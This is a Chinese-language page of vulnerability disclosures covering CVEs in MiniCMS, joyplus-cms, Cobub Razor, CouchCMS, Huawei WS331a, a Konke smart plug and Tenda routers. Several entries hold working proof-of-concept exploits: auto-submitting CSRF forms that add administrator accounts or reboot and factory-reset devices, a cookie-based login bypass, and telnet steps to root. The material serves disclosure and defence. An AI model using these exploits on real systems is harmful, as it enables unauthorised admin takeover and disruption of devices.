CVE中文申请站

CVE-2018-9092:MiniCMS 1.10存在CSRF漏洞可增加管理员账户

一、漏洞摘要

漏洞名称: MiniCMS 1.10存在CSRF漏洞可增加管理员账户
上报日期: 2018-03-30
漏洞发现者: zixian(me@zixian.org、zixian@5ecurity.cn)
产品首页: https://github.com/bg5sbk/MiniCMS
软件链接: https://github.com/bg5sbk/MiniCMS
版本: 1.10
CVE编号: CVE-2018-9092


二、漏洞概述

MiniCMS 1.10存在CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可增加管理员账户。MiniCMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

 <html>
 <head><meta http-equiv="Content-Type" content="text/html; charset=GB2312">
 <title>test</title>
 <body>
 <form action="http://127.0.0.1/minicms/mc-admin/conf.php" method="post">
 <input type="hidden" name="site_name" value="hack123" />  
 <input type="hidden" name="site_desc" value="hacktest" />  
 <input type="hidden" name="site_link" value="http://127.0.0.1/minicms" />  
 <input type="hidden" name="user_nick" value="hack" />  
 <input type="hidden" name="user_name" value="admin" />  
 <input type="hidden" name="user_pass" value="hackpass" />  
 <input type="hidden" name="comment_code" value="" />  
 <input type="hidden" name="save" value=" " /> 
 </form>
 <script>
  document.forms[0].submit();
 </script>
 </body>
 </head>
 </html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/27/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9092
exploit-db:https://www.exploit-db.com/exploits/44362/

CVE-2018-8717:joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户

一、漏洞摘要

漏洞名称: joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户
上报日期: 2018-03-14
漏洞发现者: yx(yx@5ecurity.cn)
产品首页: https://github.com/joyplus/joyplus-cms/
软件链接: https://github.com/joyplus/joyplus-cms/
版本: 1.6.0
CVE编号: CVE-2018-8717


二、漏洞概述

joyplus-cms 1.6.0存在CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可将普通用户提成为管理员权限。joyplus-cms是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.126.129/joyplus-cms-master/joyplus-cms/manager/admin_ajax.php?action=save&tab={pre}manager" method="POST">
      <input type="hidden" name="m&#95;id" value="" />
      <input type="hidden" name="flag" value="add" />
      <input type="hidden" name="m&#95;name" value="admin1" />
      <input type="hidden" name="m&#95;password" value="admin1" />
      <input type="hidden" name="m&#95;status" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/32/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8717

CVE-2018-7720:Cobub Razor 0.7.2存在跨站请求伪造漏洞

一、漏洞摘要

漏洞名称: Cobub Razor 0.7.2存在跨站请求伪造漏洞
上报日期: 2018-03-06
漏洞发现者: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
产品首页: http://www.cobub.com/
软件链接: https://github.com/cobub/razor/
版本: 0.7.2
CVE编号: CVE-2018-7720


二、漏洞概述

Cobub Razor 0.7.2存在跨站请求伪造漏洞,管理员登陆后访问特定页面可增加管理员账号。保存如下利用代码为html页面,打开页面将增加test123/test的管理员账号。

三、利用代码

利用代码如下:

  <body>
  <script>alert(document.cookie)</script>
    <form action="http://localhost/index.php?/user/createNewUser/" method="POST">
      <input type="hidden" name="username" value="test123" />
      <input type="hidden" name="email" value="test&#64;test123&#46;test" />
      <input type="hidden" name="password" value="test" />
      <input type="hidden" name="confirm&#95;password" value="test" />
      <input type="hidden" name="userrole" value="3" />
      <input type="hidden" name="user&#47;ccreateNewUser" value="�&#136;&#155;�&#187;�" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/28/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7720

CVE-2018-7662:Couch through 2.0存在路径泄露漏洞

一、漏洞摘要

漏洞名称: Couch through 2.0存在路径泄露漏洞
上报日期: 2018-03-04
漏洞发现者: zzw (zzw@5ecurity.cn)
产品首页: https://github.com/CouchCMS/CouchCMS/
软件链接: https://github.com/CouchCMS/CouchCMS/
版本: 2.0
CVE编号: CVE-2018-7662


二、漏洞概述

Couch through 2.0存在路径泄露漏洞,当访问特定url时系统返回的报错信息中暴露物理路径信息。Couch through是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。
111.png
222.png

三、利用代码

访问如下页面,报错信息中显示完整物理路径信息。

Location:
includes/mysql2i/mysql2i.func.php
addons/phpmailer/phpmailer.php


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/35/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7662

CVE-2016-6159:华为WS331a产品管理页面存在凭证管理漏洞

一、漏洞摘要

漏洞名称: 华为WS331a产品管理页面存在凭证管理漏洞
上报日期: 2016-09-07
漏洞发现者: zixian(me@zixian.org)
产品首页: http://www.huawei.com/
软件链接: http://www.huawei.com/
版本: WS331a-10 V100R001C02B017SP01及之前版本
CVE编号: CVE-2016-6159


二、漏洞概述

WS331a产品的管理页面中存在一个凭证管理漏洞,由于在密码校验时处理不当,未经认证的攻击者可以向受影响产品LAN口发送特定报文利用此漏洞。成功利用此漏洞,攻击者可以以管理员权限登录设备。(漏洞编号:HWPSIRT-2016-07079)
此漏洞的CVE编号为:CVE-2016-6159。


三、利用代码

漏洞发现者未公开利用代码。

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/21/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6159
华为官方:http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160907-01-ws331a-en

CVE-2016-6158:华为WS331a产品管理页面存在CSRF漏洞

一、漏洞摘要

漏洞名称: 华为WS331a产品管理页面存在CSRF漏洞
上报日期: 2016-09-07
漏洞发现者: zixian(me@zixian.org)
产品首页: http://www.huawei.com/
软件链接: http://www.huawei.com/
版本: WS331a-10 V100R001C02B017SP01及之前版本
CVE编号: CVE-2016-6158


二、漏洞概述

华为WS331a 是一款便携无线路由器。
WS331a产品的管理页面中存在一个CSRF漏洞,未经过认证的攻击者可以利用此漏洞发起CSRF攻击。成功利用此漏洞,攻击者可以向受影响设备提交特定请求进而导致设备恢复出厂设置或者重启。 (漏洞编号:HWPSIRT-2016-07078)
此漏洞的CVE编号为:CVE-2016-6158。


三、利用代码

当管理员登陆后,打开如下poc页面,WS331a设备将重启。
poc.html:

<form action="http://192.168.3.1/api/service/reboot.cgi" method="post">
</form>
<script> document.forms[0].submit(); </script>

当管理员登陆后,打开如下poc页面,WS331a设备将恢复初始化配置。设备自动重启后不需要密码即可连接热点,并使用amdin/admin对设备进行管理控制。

<form action="http://192.168.3.1/api/service/restoredefcfg.cgi" method="post">
</form>
<script> document.forms[0].submit(); </script> 


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/20/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6158
华为官方:http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160907-01-ws331a-en

CVE-2014-7279:Konke智能插座非授权访问管理接口漏洞

一、漏洞摘要

漏洞名称: Konke智能插座非授权访问管理接口漏洞
上报日期: 2014-10-29
漏洞发现者: gamehacker(gh@waloudong.org)&zixian(me@zixian.org)
产品首页: http://www.ikonke.com/
软件链接: http://www.ikonke.com/
版本: K
CVE编号: CVE-2014-7279


二、漏洞概述

“Konke”是来自中国的一款智能家居产品(http://www.ikonke.com/),该产品存在安全漏洞导致攻击者可以利用漏洞获取设备管理权限。
Konke智能插座加电启动后会打开23端口,攻击者可以直接使用telnet工具登录23端口,可以不用密码得到root权限。

三、利用代码

1、扫描Konke:可以使用nmap等工具对设备的23端口进行扫描;
2、连接设备:使用telnet连接Konke设备的23端口;
3、获得权限:连接成功即可获得root权限。
k.png
并可以看到设备使用openwrt系统架构,可以使用busybox等工具执行系统命令对设备进行进一步的控制。

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/18/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7279
exploit-db:https://www.exploit-db.com/exploits/35103/

CVE-2014-7281:腾达A32无线路由器跨站请求伪造漏洞

一、漏洞摘要

漏洞名称: 腾达A32无线路由器跨站请求伪造漏洞
上报日期: 2014-10-14
漏洞发现者: zixian(me@zixian.org)
产品首页: http://www.tenda.com.cn/
软件链接: http://www.tenda.com.cn/download/detail-1824.html
版本: V5.07.53_CN
CVE编号: CVE-2014-7281


二、漏洞概述

腾达A32是深圳市吉祥腾达科技有限公司的一款无线路由器产品(http://www.tenda.com.cn/search/a32.html),该产品V5.07.53_CN固件中存在跨站请求伪造漏洞,管理员登录后访问攻击页面可触发CSRF漏洞,可对设备进行重启等操作。


三、利用代码

管理员登陆后访问如下url,设备将重启。

http://192.168.2.1/goform/SysToolReboot


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/19/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7281
exploit-db:https://www.exploit-db.com/exploits/34969/
MISC:http://packetstormsecurity.com/files/128671/Tenda-A32-Cross-Site-Request-Forgery.html
OSVDB:http://osvdb.org/show/osvdb/113308

CVE-2014-5246:腾达A5s无线路由器认证绕过漏洞

一、漏洞摘要

漏洞名称: 腾达A5s无线路由器认证绕过漏洞
上报日期: 2014-08-18
漏洞发现者: zixian(me@zixian.org)
产品首页: http://www.tenda.com.cn/
软件链接: http://www.tenda.com.cn/download/detail-1082.html
版本: V3.02.05_CN
CVE编号: CVE-2014-5246


二、漏洞概述

腾达A5s是深圳市吉祥腾达科技有限公司的一款无线路由器产品(http://www.tenda.com.cn/search/a5s.html),该产品V3.02.05_CN固件中存在认证绕过漏洞,可通过修好cookie信息绕过管理员账号及密码登录路由器后台管理页面进行操作。


三、利用代码

打开无线路由器管理地址。

http://192.168.2.1/

通过javascript脚本设置cookies值。

javascript:document.cookie='admin:language=zh-cn'

打开无线路由器设置页面,即可直接访问并进行管理员操作。

http://192.168.2.1/advance.asp


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/16/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5246
exploit-db:https://www.exploit-db.com/exploits/34361/
MISC:http://packetstormsecurity.com/files/127905/Tenda-A5s-Router-Authentication-Bypass.html
BID:http://www.securityfocus.com/bid/69267
OSVDB:http://osvdb.org/show/osvdb/110146
XF:https://exchange.xforce.ibmcloud.com/vulnerabilities/95337